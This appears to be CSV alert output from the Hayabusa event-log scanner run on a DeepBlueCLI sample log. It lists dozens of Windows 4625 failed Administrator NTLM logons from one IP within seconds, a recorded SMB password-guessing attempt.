2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
